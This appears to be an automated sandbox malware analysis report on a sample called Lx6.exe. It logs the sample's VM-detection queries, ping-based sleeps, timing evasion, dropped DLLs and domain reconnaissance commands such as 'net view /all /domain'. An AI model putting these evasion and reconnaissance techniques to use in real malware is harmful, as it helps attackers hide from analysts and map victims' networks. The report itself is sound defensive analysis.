Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\Desktop\Lx6.exe TID: 4728	Thread sleep count: 43 > 30
Source: C:\Users\user\Desktop\Lx6.exe TID: 4728	Thread sleep count: 33 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\Lx6.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9749
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5459

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain

Source: C:\Users\user\Desktop\Lx6.exe	API coverage: 8.0 %
Source: C:\Windows\SysWOW64\cmd.exe	API coverage: 3.7 %

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msihj3zd.dll	Jump to dropped file

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Lx6.exe

Source: explorer.exe, 0000000E.00000000.482443266.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000E.00000000.536033895.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 0000000E.00000000.482633151.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Storage Accelerator
Source: RuntimeBroker.exe, 0000001F.00000000.642513702.0000014899851000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_SystemDriverstorfltWin32_SystemDriverWin32_ComputerSystem374653StoppedOKstorfltstorfltstorfltKernel DriverManualNormalC:\Windows\system32\drivers\vmstorfl.sysMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage Accelerator
Source: 9AF9.bin1.20.dr	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: 9AF9.bin1.20.dr	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000000E.00000000.521152311.000000000CDEC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: 9AF9.bin1.20.dr	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: 9AF9.bin1.20.dr	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Guest Infrastructure Driver
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_SystemDrivervmgidWin32_SystemDriverWin32_ComputerSystem374653StoppedOKvmgidvmgidvmgidKernel DriverManualNormalC:\Windows\system32\drivers\vmgid.sysMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure Driver
Source: explorer.exe, 0000000E.00000000.484259706.00000000085A9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9AF9.bin1.20.dr	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: 9AF9.bin1.20.dr	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: RuntimeBroker.exe, 0000001B.00000000.604758910.000001D021800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:H

Source: C:\Users\user\Desktop\Lx6.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

